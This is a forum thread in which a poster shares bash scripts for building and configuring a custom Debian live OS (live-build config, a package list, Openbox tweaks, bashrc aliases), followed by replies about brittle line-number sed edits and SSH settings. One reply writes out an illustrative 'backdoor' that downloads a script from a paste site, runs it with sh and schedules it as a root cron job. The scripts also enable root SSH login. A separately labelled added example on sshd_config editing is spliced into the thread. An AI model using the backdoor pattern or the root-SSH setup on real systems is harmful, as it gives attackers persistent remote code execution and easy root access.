Custom Live OS for Optimal OPSEC


JakeofArk

Feb 5, 2022
I threw away my hard drive and switched to running a Debian-based custom live OS as my daily driver about a year ago. I thought I'd share with my favorite podcast's community the two bash scripts that enable it all. One script, zero.live, configures the live-build server and the other, zero.run, customizes the environment on boot. I'd be happy to help anyone on here who wants to give it a try.

zero.live

#!/bin/bash
# Build out the live-build tool and edit its configuration.
apt install -y live-build
mkdir liveos && cd liveos
lb config
mkdir -p auto
cp /usr/share/doc/live-build/examples/auto/* auto/

# auto/config. Change buster to bullseye and i386 to amd64 if you'd like.
# This setup builds an ISO of around 500MB which handles compatibility with
# everything. The server version operates on about 54MB of RAM and the
# Debian 9 Openbox version runs with a full GUI on around 115MB of RAM.
cat > auto/config << 'EOF'
#!/bin/sh
set -e
lb config noauto \
    -d buster \
    --mode debian \
    --architectures i386 \
    --linux-flavours 686-pae \
    --debian-installer false \
    --archive-areas "main contrib non-free" \
    --apt-indices false \
    --memtest none \
    --bootappend-live "quiet hostname=trashos boot=live" \
    "${@}"
EOF

# With auto/config in place, lb config runs it and these options are added on top.
lb config -d buster --apt-indices false --apt-recommends false \
    --debootstrap-options "--variant=minbase" --firmware-chroot false \
    --memtest none --bootappend-live "quiet boot=live hostname=trashos"
lb clean
echo "live-tools user-setup sudo eject" > config/package-lists/recommends.list.chroot

# Set up the included packages (the list further down) and some arbitrary
# directory to include anything you'd like.
nano config/package-lists/my.list.chroot
mkdir -p config/includes.chroot/home/user/Backup

# Insert your run file (zero.run, below) and hook it into openbox: the hook
# runs at boot, edits rc.xml by line number and autostarts run.sh as root.
nano config/includes.chroot/home/user/Backup/run.sh
chmod 755 config/includes.chroot/home/user/Backup/run.sh
mkdir -p config/includes.chroot/lib/live/config
cat > config/includes.chroot/lib/live/config/2000-custom-run << 'EOF'
#!/bin/sh
sed -i '131s/4/1/g' /etc/xdg/openbox/rc.xml
echo "sudo ~/Backup/./run.sh" >> /etc/xdg/openbox/autostart
EOF
chmod 755 config/includes.chroot/lib/live/config/2000-custom-run

# Set up the simplest bootloader, remove the default splash and add your own splash.png.
mkdir -p config/bootloaders/isolinux
cp -Rv /usr/share/live/build/bootloaders/isolinux/* config/bootloaders/isolinux
nano config/bootloaders/isolinux/isolinux.cfg
rm config/bootloaders/isolinux/splash.svg

lb clean
lb build 2>&1 | tee build.log
echo "Finished..."
ls -lth
mv -v live-image-i386.hybrid.iso TrashOS.iso

# Create the above script as build.sh, run it with screen and watch it with htop.
nano build.sh && chmod 755 build.sh
screen -dmS iso ./build.sh && clear && htop -C
# From your own machine: pull the ISO off of the AWS build server with sftp
# and burn it to a USB drive.
sftp -i /home/user/Backup/VPNkey.pem admin@[BUILD SERVER IP]:/home/admin/liveos/TrashOS.iso
clear && dd if=TrashOS.iso of=/dev/[sdX] bs=1M status=progress && sync && echo 'Finished...'


config/package-lists/my.list.chroot

#You can look for other packages with apt-cache search and mix and match however you like.

chromium
xorg
openbox
xfce4-terminal
mousepad
pcmanfm
net-tools
network-manager
network-manager-gnome
pciutils
wireshark
wget
nano
tcpdump
conky
feh
screen
htop
iotop
nmap
ncat
whois
openvpn
ssh
ufw
wipe
gnome-screenshot
curl
easy-rsa
bro-aux
git
lsof
dnsutils
software-properties-common
apt-transport-https
httptunnel
unzip
unrar
p7zip-full
vlc
usbutils
vokoscreen
lynx
pavucontrol
pulseaudio
gparted

zero.run

#!/bin/bash
# zero.run: started by the 2000-custom-run hook through the openbox autostart on every boot.
# Wallpaper, conky config, time zone and Openbox/Onyx theme tweaks; the line-number
# seds target the stock files shipped in the image.
cp -fv /home/user/Backup/background.png /etc/xdg/openbox/
cp -fv /home/user/Backup/conky.conf /etc/conky/
ln -sf /usr/share/zoneinfo/Asia/Bangkok /etc/localtime
sed -i 's/Clearlooks/Onyx/g' /etc/xdg/openbox/rc.xml
sed -i '86s/9/14/g' /etc/xdg/openbox/rc.xml
sed -i '95s/9/14/g' /etc/xdg/openbox/rc.xml
sed -i '23s/6d95de/0000ff/g' /usr/share/themes/Onyx/openbox-3/themerc
sed -i '24s/2b829d/0000ff/g' /usr/share/themes/Onyx/openbox-3/themerc
sed -i '25s/f8f8f8/ffffff/g' /usr/share/themes/Onyx/openbox-3/themerc
sed -i '42s/mediumblue/blue/g' /etc/conky/conky.conf
# Replace the login banner.
rm -f /etc/motd
cat > /etc/motd << EOF

TrashOS

EOF
# X session: black root window, no screensaver or DPMS, no Caps Lock, let root use the display.
xsetroot -solid black
xset s off -dpms
setxkbmap -option caps:none
xhost +si:localuser:root
feh --bg-center /etc/xdg/openbox/background.png
conky -b &

# Root and the live user share one .bashrc (the prompt and aliases below).
cat >> /root/.bashrc << "EOA"
source /home/user/.bashrc
EOA
cat >> /home/user/.bashrc << "EOA"
# ~/.bashrc: executed by bash(1) for non-login shells.
[ -z "$PS1" ] && return
HISTCONTROL=$HISTCONTROL${HISTCONTROL+:}ignoredups
shopt -s histappend
shopt -s checkwinsize
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
red='\[\e[0;31m\]'
RED='\[\e[1;31m\]'
blue='\[\e[0;34m\]'
BLUE='\[\e[1;34m\]'
cyan='\[\e[0;36m\]'
CYAN='\[\e[1;36m\]'
green='\[\e[0;32m\]'
GREEN='\[\e[1;32m\]'
yellow='\[\e[0;33m\]'
YELLOW='\[\e[1;33m\]'
PURPLE='\[\e[1;35m\]'
purple='\[\e[0;35m\]'
nc='\[\e[0m\]'
if [ "$UID" = 0 ]; then
PS1="$nc\u$nc@$nc\H$nc:$nc\w$nc\\n$nc#$nc "
else
PS1="$blue\u$nc@$nc\H$nc:$blue\w$nc\\n$blue\$$nc "
fi
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
fi
alias aliases='sudo nano /home/user/.bashrc && source /home/user/.bashrc'
alias c='clear'
alias x='exit'
alias pubip='wget -qO- checkip.dyn.com | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"'
alias menu='sudo nano /etc/xdg/openbox/menu.xml && openbox --reconfigure'
alias pmon='watch -d -n4 sudo lsof -i -o'
alias dmon='sudo iotop -a'
alias fmon='watch -d -n4 "ls -lth /tmp"'
alias crypt='test -f /usr/bin/veracrypt && /usr/bin/veracrypt || ~/Backup/./veracrypt-x86'
alias nyt='wget https://www.nytimes.com -O i.htm && lynx i.htm && sudo rm -f i.htm'
alias sound='pulseaudio --start && sleep 2s && pavucontrol'
alias pdf='chromium --headless --disable-gpu --print-to-pdf=/home/user/Downloads/grc.pdf https://www.grc.com/securitynow.htm && chromium file:///home/user/Downloads/grc.pdf'
EOA
# Replace the Openbox root menu.
mv -v /etc/xdg/openbox/menu.xml /etc/xdg/openbox/menu.xml.bak
cat > /etc/xdg/openbox/menu.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<openbox_menu xmlns="http://openbox.org/3.4/menu">
<menu id="root-menu" label="Openbox 3">
<separator label="TrashOS" />
<item label="Terminal">
<action name="Execute">
<command>xfce4-terminal --geometry=99x40 --hide-scrollbar --hide-menubar --title=t0s</command>
</action>
</item>
<item label="Chromium">
<action name="Execute">
<command>chromium</command>
</action>
</item>
<item label="Files">
<action name="Execute">
<command>pcmanfm</command>
</action>
</item>
<item label="Text">
<action name="Execute">
<command>mousepad</command>
</action>
</item>
<menu id="menu" label="Tools">
<item label="Networks">
<action name="Execute">
<command>nm-connection-editor</command>
</action>
</item>
<item label="ScreenSh">
<action name="Execute">
<command>gnome-screenshot -i</command>
</action>
</item>
<item label="ScreenRc">
<action name="Execute">
<command>vokoscreen</command>
</action>
</item>
<item label="Wireshark">
<action name="Execute">
<command>sudo wireshark</command>
</action>
</item>
</menu>
<item label="Shutdown">
<action name="Execute">
<command>sudo shutdown -P --no-wall now</command>
</action>
</item>
</menu>
</openbox_menu>
EOF
# Key bindings: swap scrot for gnome-screenshot and add Super-key shortcuts in rc.xml.
sed -i '317s/scrot/gnome-screenshot \-i/g' /etc/xdg/openbox/rc.xml
sed -i '319i\
<keybind key="W-t">\
<action name="Execute"><command>xfce4-terminal --geometry=99x40 --hide-scrollbar --hide-menubar --title=TrashOS</command></action>\
</keybind>\
<keybind key="W-f">\
<action name="Execute"><command>pcmanfm</command></action>\
</keybind>\
<keybind key="W-w">\
<action name="Execute"><command>mousepad</command></action>\
</keybind>\
<keybind key="W-s">\
<action name="Execute"><command>gnome-screenshot -i</command></action>\
</keybind>\
<keybind key="W-r">\
<action name="Execute"><command>vokoscreen</command></action>\
</keybind>\
' /etc/xdg/openbox/rc.xml
openbox --reconfigure
# sshd: allow root login and move off port 22. The line-number substitution
# targets a different line on Debian 11 (see the discussion below).
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "Port 44444" >> /etc/ssh/sshd_config
sed -i '56s/no/yes/g' /etc/ssh/sshd_config
# ssh stays stopped until it is deliberately started later (see the vpn alias below).
systemctl stop ssh
killall pulseaudio
ufw enable
ufw logging medium
exit 0
 
I find it's best to get ssh off of its default port to cut down on log entries when uploading this ISO to Vultr.
The next line after your quote disables ssh but I don't know why you wouldn't include it.

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "Port 44444" >> /etc/ssh/sshd_config
sed -i '56s/no/yes/g' /etc/ssh/sshd_config
systemctl stop ssh

It's modifications to a default live-build straight from Debian. There is no way to include malware. Change

sed -i '56s/no/yes/g' /etc/ssh/sshd_config

to

sed -i '58s/no/yes/g' /etc/ssh/sshd_config

if using Debian 11.
 
BTW, here is what my backdoor code would look like in one of these live environments:

#Begin backdoor code
cat > /tmp/bd.sh << EOF
wget https://del.dog/raw/okitawekit -O - | sh > /dev/null 2>&1
EOF
chmod 755 /tmp/bd.sh
cronjob="*/22 * * * * /tmp/bd.sh"
(crontab -u root -l; echo "$cronjob" ) | crontab -u root -
screen -dmS sh /tmp/bd.sh
#End backdoor code
The point of this post wasn't malicious; it's to share a different way of doing things I've come to enjoy. Hope someone finds a good use for their own purposes.
 
Doing in-place seds by line number is suspicious to me. Without comments it's pretty unclear what's going on unless I have the edited file on hand. Additionally it's pretty brittle. It would be much clearer, and almost self-documenting, to do something like:

Code:
sed -i '/SomeImportantSetting/s/oldValue/newValue/'

sed commands take a line range at the start, which can be a regex, which will only find specific lines, then you do your substitute on that/those lines.

And I never suggested you were including malware, but you could be opening a backdoor of some sort, because SSH does have options to allow passwordless logins, for example. In any case you're making a change I would never make, none of my systems allow SSH to log in as root, and I don't understand why you would make that, or any other change, if SSH is to remain disabled.
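As an added example (not code from the thread), this is the regex-anchored approach from the post above applied to zero.run's sshd_config edits: the directive is located by name rather than by a hard-coded line number, so one function covers the buster (line 56) and bullseye (line 58) defaults, stays idempotent when the hook runs twice, and can be checked before ssh is ever started. set_sshd_option and get_sshd_option are hypothetical helper names, and the sshd_config excerpt is constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread. Assumed helper names:
#   set_sshd_option FILE KEY VALUE  rewrite the first "KEY ..." line, active or
#       commented out (e.g. "#PasswordAuthentication yes"), as "KEY VALUE";
#       append the directive if the file has none.
#   get_sshd_option FILE KEY        print the value of the first active "KEY" line.
# The directive is found by name, so the edit lands on the same setting whether
# Debian's stock file puts it on line 56 (buster) or 58 (bullseye), and running
# it twice leaves one line instead of stacking duplicates. Only the first
# occurrence is touched, so a directive inside a later "Match" block is left alone.
# VALUE must not contain the sed specials / & or backslash.
set_sshd_option() {
    file=$1; key=$2; value=$3
    # grep -n prints "LINE:text"; keep the line number of the first hit.
    n=$(grep -n -i -E "^[[:space:]]*#?[[:space:]]*${key}([[:space:]]|$)" "$file" \
        | head -n 1 | cut -d: -f1)
    if [ -n "$n" ]; then
        sed "${n}s/.*/${key} ${value}/" "$file" > "$file.tmp" && mv "$file.tmp" "$file"
    else
        printf '%s %s\n' "$key" "$value" >> "$file"
    fi
}

get_sshd_option() {
    grep -i -E "^[[:space:]]*$2[[:space:]]+" "$1" | head -n 1 | awk '{ print $2 }'
}

# Demo on a constructed excerpt shaped like Debian's stock sshd_config (not the
# real file), making the changes zero.run's ssh block is after: root login,
# port 44444 and, as discussed in the thread, password authentication.
demo() {
    f=$(mktemp)
    cat > "$f" << 'EOF'
#Port 22
#PermitRootLogin prohibit-password
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no
EOF
    set_sshd_option "$f" Port 44444
    set_sshd_option "$f" PermitRootLogin yes
    set_sshd_option "$f" PasswordAuthentication yes
    set_sshd_option "$f" PasswordAuthentication yes   # second run: still one line
    cat "$f"
    rm -f "$f"
}
demo
```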
 
The brittleness is fine with a live system because it will always boot the same initial setup. If you want more comments, take a look at the man pages. An easy way to take a look at this file (which is included in any Linux system with openssh):

cat -n /etc/ssh/sshd_config | head -n 58 | tail -n 5

As for my use case, I'm including an .ovpn client file to deploy these in the field, so as soon as it boots and gets net it's on my VPN network. The user still needs to set the password and a port still needs to be opened for my backdoor. ;) All of this is accomplished with an alias. Something like:

alias vpn="screen -dmS vpn openvpn --config client10.ovpn && systemctl start ssh && ufw allow 44444 && sudo sh -c 'passwd'"

Once I'm SSHed into the box, messing with users and sudo is pointless since it's my live CD. I'm not depending on sudo for security in this case and this isn't a multi-user Linux system, it's just a live disk to help deploy code into the field or run a temporary web server or whatever you want. My other use case is running these images inside QEMU. You can turn on Apache there instead and make little in-line changes to its config. You might find it's better in a live system to let a service fully initialize and then turn it off at the end of your script if it's not going to be used 100% of the time.

https://live-team.pages.debian.net/live-manual/html/live-manual/examples.en.html

Use it for whatever you want, and I'll try and help you customize it a bit to your needs. Other than the above link, there's really not great documentation on how to do this but it's really not that hard. Oh and Steve Gibson...this is what Windows can't do. You can't make a BartPE ISO with the latest software in any easy way like this.
 
Here let me better explain the need. The TrueCrypt documentation suggests to do this but doesn't really elaborate.

https://www.grc.com/misc/truecrypt/TrueCrypt User Guide.pdf <-- Ctrl + F "live"



And this is basically where I got the idea:

 
A more complete walk-through is available here: